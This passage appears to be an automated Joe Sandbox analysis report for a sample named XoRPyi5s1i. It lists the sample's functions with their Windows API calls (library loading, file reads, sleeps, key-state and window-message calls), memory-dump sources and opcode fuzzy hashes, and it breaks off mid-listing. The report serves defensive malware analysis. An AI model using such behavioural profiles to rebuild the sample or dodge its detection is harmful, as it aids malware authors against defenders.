                                    • Opcode ID: eece721675eb64d467b3ee7c34e9e49341dfd61002b4d814f92ecf25be261236
                                    • Instruction ID: e133725525b5d54db0b62613ecc76aba89aa5e87504459285405bbb61adcc2da
                                    • Opcode Fuzzy Hash: eece721675eb64d467b3ee7c34e9e49341dfd61002b4d814f92ecf25be261236
                                    • Instruction Fuzzy Hash: 9F315B75A00645EFCB08CF6CD480AADB7B5BF89320F158629E81997700D770B9A4CBD0
                                    Function 0014ED18 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                    • Instruction ID: cfcf511ab321608c15686dcdedbc157dec821b0591c667593699aa5cb6742b35
                                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                    • Instruction Fuzzy Hash: BC31C274E00106DBD718DF98C490A69FBF6FF49340B6586A5E40ACB266DB31EDD1CB90
                                    Function 001A9A75 Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: ClearVariant
                                    • String ID:
                                    • API String ID: 1473721057-0
                                    • Opcode ID: 7387e29e9035e124a4127bafb338205a37f5dab60a56257727ae920aa1aa5b7c
                                    • Instruction ID: afcc07dce5821a53327d710d949627fe2d7eaff66a2244dc97fe8dc0fdb897c5
                                    • Opcode Fuzzy Hash: 7387e29e9035e124a4127bafb338205a37f5dab60a56257727ae920aa1aa5b7c
                                    • Instruction Fuzzy Hash: 24415B74504611CFDB25CF58C484B1ABBE0BF45304F1989ACE99A4B372C372E886CF52
                                    Function 0015ED06 Relevance: 1.6, APIs: 1, Instructions: 66COMMONLIBRARYCODE
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: __getptd_noexit
                                    • String ID:
                                    • API String ID: 3074181302-0
                                    • Opcode ID: 645c12cc53c94127999ea956a3e41c1d86cc55840813eb259c6a3a684e3533fd
                                    • Instruction ID: 6bea1ab02612afd0fdda7ecf6b456afdc902f8d142481878f30a81f71a2fb41e
                                    • Opcode Fuzzy Hash: 645c12cc53c94127999ea956a3e41c1d86cc55840813eb259c6a3a684e3533fd
                                    • Instruction Fuzzy Hash: 68213072C15644CFD71A7FA4DC467583AA1AF62337F260640EC744F1E2DBB48A488AA1
                                    Function 001341A9 Relevance: 1.6, APIs: 1, Instructions: 63libraryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00134214: FreeLibrary.KERNEL32(00000000,?), ref: 00134247
                                    • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,001339FE,?,00000001), ref: 001341DB
                                      • Part of subcall function 00134291: FreeLibrary.KERNEL32(00000000), ref: 001342C4
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Library$Free$Load
                                    • String ID:
                                    • API String ID: 2391024519-0
                                    • Opcode ID: ebd350db7e0a273a1b476c1cd86b89b389acdd27efcb2d55ee93c66ef4ec7d98
                                    • Instruction ID: 0a617f98205abbf2beaaf19f1c7afb3da7b4659a1c62d120750fc79b510547f2
                                    • Opcode Fuzzy Hash: ebd350db7e0a273a1b476c1cd86b89b389acdd27efcb2d55ee93c66ef4ec7d98
                                    • Instruction Fuzzy Hash: A111A331600316ABDB14BB74EC06F9E77A99F50700F108429F996BA1C1DBB0AA449BA0
                                    Function 001A9B45 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: ClearVariant
                                    • String ID:
                                    • API String ID: 1473721057-0
                                    • Opcode ID: 67448bbaaa9d0ac31d949e14fd53ae8ec60eb62d94d7a208ec1370563f9d1d76
                                    • Instruction ID: 0ad0f8723b7509831522f43d94b4184cdfd7c91172b903978f4a74b898211f27
                                    • Opcode Fuzzy Hash: 67448bbaaa9d0ac31d949e14fd53ae8ec60eb62d94d7a208ec1370563f9d1d76
                                    • Instruction Fuzzy Hash: 94214470508201CFDB25DF69C444B1ABBE1BF89304F15496CEA9A8B232C732E846CF52
                                    Function 0015AF61 Relevance: 1.6, APIs: 1, Instructions: 56COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • ___lock_fhandle.LIBCMT ref: 0015AFC0
                                      • Part of subcall function 00157BDA: __getptd_noexit.LIBCMT ref: 00157BDA
                                      • Part of subcall function 00157C0E: __getptd_noexit.LIBCMT ref: 00157C0E
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: __getptd_noexit$___lock_fhandle
                                    • String ID:
                                    • API String ID: 1144279405-0
                                    • Opcode ID: a56b3f6e796adc405d806846667284c09848ddb635eff508bf1006082ccf2145
                                    • Instruction ID: d86e98961d63c69910f3489a624ce252f779a0c26c5e33165c3a0eab81123c84
                                    • Opcode Fuzzy Hash: a56b3f6e796adc405d806846667284c09848ddb635eff508bf1006082ccf2145
                                    • Instruction Fuzzy Hash: C5116072809610DFD7126FA4D88276D7660AF62337F5A4340FC341F1E2D7B48D488BA2
                                    Function 0013C2E0 Relevance: 1.6, APIs: 1, Instructions: 51fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • ReadFile.KERNELBASE(00000000,?,00010000,00000000,00000000,00000000,001CDC00,00000000,?,0013464E,001CDC00,00010000,00000000,00000000,00000000,00000000), ref: 0013C337
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: FileRead
                                    • String ID:
                                    • API String ID: 2738559852-0
                                    • Opcode ID: c014f59b63db2c459f43c371277dd065e4d98267c733c288f0efd1df1b6a3742
                                    • Instruction ID: 2f16bdd84adcb161f29ffa9b096008e96875a6c8de9268db48f686c5941dc0b2
                                    • Opcode Fuzzy Hash: c014f59b63db2c459f43c371277dd065e4d98267c733c288f0efd1df1b6a3742
                                    • Instruction Fuzzy Hash: 1A114531200B419FE720CE5AC880F6AB7E9BF54754F14C41EE4AA9AA50C7B1E844CBA0
                                    Function 001339DB Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: LibraryLoad
                                    • String ID:
                                    • API String ID: 1029625771-0
                                    • Opcode ID: daa29a418462963be006df0018d3ea545f1b1bfa4cb5ec5a6529a35093eb270d
                                    • Instruction ID: 4c46899dc2dee30a1f62ea9c7ff7861f7f2bb1d06f0017be2129aebcfd84ec07
                                    • Opcode Fuzzy Hash: daa29a418462963be006df0018d3ea545f1b1bfa4cb5ec5a6529a35093eb270d
                                    • Instruction Fuzzy Hash: 28013135500109EFCF05EFA4C8928FEBB74AF21344F108069B566A71A5EB30AA49DFA4
                                    Function 00152AAE Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                    Download Yara Rule
                                    APIs
                                    • __lock_file.LIBCMT ref: 00152AED
                                      • Part of subcall function 00157C0E: __getptd_noexit.LIBCMT ref: 00157C0E
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: __getptd_noexit__lock_file
                                    • String ID:
                                    • API String ID: 2597487223-0
                                    • Opcode ID: f00c1d4b191ee12458134eaac0404e344abc2aaa917ef2e0a03ef8350f04b932
                                    • Instruction ID: 3fa8bb246b75a6a7a7a50c541d712172acf2ed375ac57797ee3239e00f2df97e
                                    • Opcode Fuzzy Hash: f00c1d4b191ee12458134eaac0404e344abc2aaa917ef2e0a03ef8350f04b932
                                    • Instruction Fuzzy Hash: 97F0A932A00205EADF22AFB48C0239F3AA1AF12322F158415FC309F191C7788A5ADB81
                                    Function 00134252 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                    Download Yara Rule
                                    APIs
                                    • FreeLibrary.KERNEL32(?,?,?,?,?,001339FE,?,00000001), ref: 00134286
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: FreeLibrary
                                    • String ID:
                                    • API String ID: 3664257935-0
                                    • Opcode ID: f4962c63aa7c8bf29b347c70a76987b73a9b0afd85394800752450b7e26ca468
                                    • Instruction ID: 366454ccb3a6955e1450d2341afe65baac210f3c3d7d9e12fb8fe71d35690dc7
                                    • Opcode Fuzzy Hash: f4962c63aa7c8bf29b347c70a76987b73a9b0afd85394800752450b7e26ca468
                                    • Instruction Fuzzy Hash: 2FF03971505702CFCB38DF64E890817BBE4BF143257258A7EF5D6A2621C772A884DF50
                                    Function 001340A7 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 001340C6
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: LongNamePath
                                    • String ID:
                                    • API String ID: 82841172-0
                                    • Opcode ID: 552d947d391b0541b5ec075da019744298a62037130cd155feae7a74dfbfa9cd
                                    • Instruction ID: 3f439887e89cbd0ee7aeb03035d2490941ae0a6bec2d0e4820b7b58fc272ae6d
                                    • Opcode Fuzzy Hash: 552d947d391b0541b5ec075da019744298a62037130cd155feae7a74dfbfa9cd
                                    • Instruction Fuzzy Hash: 89E0C2366002246BC711A658DC46FEA77ADDFC86A0F0941B5F909E7244EBA4ADC18690
                                    Function 0017BCF4 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: __fread_nolock
                                    • String ID:
                                    • API String ID: 2638373210-0
                                    • Opcode ID: 3cca4198d2bc13ecada8dba30311a83a0df564d107d747b73ddd6f796e1577fd
                                    • Instruction ID: 550718c503f80276fe23f0ed905f0b775d60e40ec0f4b4227f6cf4e29e0e2b55
                                    • Opcode Fuzzy Hash: 3cca4198d2bc13ecada8dba30311a83a0df564d107d747b73ddd6f796e1577fd
                                    • Instruction Fuzzy Hash: 7CE0D8B0108B009FD7388B24D840BE373E0EB05319F00091CF6ABC3241EB637841C759
                                    Function 0177B7F0 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetFileAttributesW.KERNELBASE(?), ref: 0177B7FB
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1614350929.000000000177A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0177A000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_177a000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: AttributesFile
                                    • String ID:
                                    • API String ID: 3188754299-0
                                    • Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                    • Instruction ID: 3f16f1e48846c8f4c01882aa55573353a35fbbe0fe45b958290baa999feacf26
                                    • Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                    • Instruction Fuzzy Hash: DEE0C230A4620CEFDF20CFBCCC08AADB3A8DB44320F008B98E916CB2C0D5308A409B94
                                    Function 00134798 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                    Download Yara Rule
                                    APIs
                                    • SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00000000,00000000,?,001A40EA,00000000,00000000,00000000), ref: 001347A9
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: FilePointer
                                    • String ID:
                                    • API String ID: 973152223-0
                                    • Opcode ID: bf36fc1ff12ed597c7568056104750b6b0096dded3b9b7b0e9b3f0d8fa0f32ba
                                    • Instruction ID: 9bb843e7a5ad10b6bf9e919c05dcc5a702bb4659eba0cae138981f95a20c9c6c
                                    • Opcode Fuzzy Hash: bf36fc1ff12ed597c7568056104750b6b0096dded3b9b7b0e9b3f0d8fa0f32ba
                                    • Instruction Fuzzy Hash: A5D0C974640208BFEB04CB94DC46F9A7BBCEB04718F200194F600AA2D0E2F2BE808B55
                                    Function 0177B7C0 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetFileAttributesW.KERNELBASE(?), ref: 0177B7CB
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1614350929.000000000177A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0177A000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_177a000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: AttributesFile
                                    • String ID:
                                    • API String ID: 3188754299-0
                                    • Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                    • Instruction ID: e35c750b13e7bd138f88de53f669d6a33a688adb6cbb4f598cb3941f4be3ed5a
                                    • Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                    • Instruction Fuzzy Hash: B7D0A73090520CEBCF10CFF89C089DAF3A8DB04361F004755FD15C3280D53199509790
                                    Function 0177D1FC Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON
                                    Download Yara Rule
                                    APIs
                                    • Sleep.KERNELBASE(000001F4), ref: 0177D211
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1614350929.000000000177A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0177A000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_177a000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Sleep
                                    • String ID:
                                    • API String ID: 3472027048-0
                                    • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                    • Instruction ID: 2f49b4768fd5312ce58a4edbffbdf84a6de5f59395ad3ee6bf8b3e2b1b5cc797
                                    • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                    • Instruction Fuzzy Hash: 75E09A7494410DAFDB10EFA4D54969E7BB4EF04311F1005A1FD0596691DA309A549A62
                                    Function 0177D200 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                    Download Yara Rule
                                    APIs
                                    • Sleep.KERNELBASE(000001F4), ref: 0177D211
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1614350929.000000000177A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0177A000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_177a000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Sleep
                                    • String ID:
                                    • API String ID: 3472027048-0
                                    • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                    • Instruction ID: 0a6bf52f4c7bb3a968997f987751abc6ff34f79211fd228647c12a443aa6c6f2
                                    • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                    • Instruction Fuzzy Hash: A4E0E67494410DDFDB00EFF4D54969E7FB4EF04301F100161FD01D2281D6309D509A62

                                    Non-executed Functions

                                    Function 0019F7FF Relevance: 68.9, APIs: 37, Strings: 2, Instructions: 630windowkeyboardnativeCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0014B34E: GetWindowLongW.USER32(?,000000EB), ref: 0014B35F
                                    • NtdllDialogWndProc_W.NTDLL(?,0000004E,?,?,?,?,?,?,?), ref: 0019F87D
                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0019F8DC
                                    • GetWindowLongW.USER32(?,000000F0), ref: 0019F919
                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0019F940
                                    • SendMessageW.USER32 ref: 0019F966
                                    • _wcsncpy.LIBCMT ref: 0019F9D2
                                    • GetKeyState.USER32(00000011), ref: 0019F9F3
                                    • GetKeyState.USER32(00000009), ref: 0019FA00
                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0019FA16
                                    • GetKeyState.USER32(00000010), ref: 0019FA20
                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0019FA4F
                                    • SendMessageW.USER32 ref: 0019FA72
                                    • SendMessageW.USER32(?,00001030,?,0019E059), ref: 0019FB6F
                                    • SetCapture.USER32(?), ref: 0019FB9F
                                    • ClientToScreen.USER32(?,?), ref: 0019FC03
                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 0019FC29
                                    • ReleaseCapture.USER32 ref: 0019FC34
                                    • GetCursorPos.USER32(?), ref: 0019FC69
                                    • ScreenToClient.USER32(?,?), ref: 0019FC76
                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 0019FCD8
                                    • SendMessageW.USER32 ref: 0019FD02
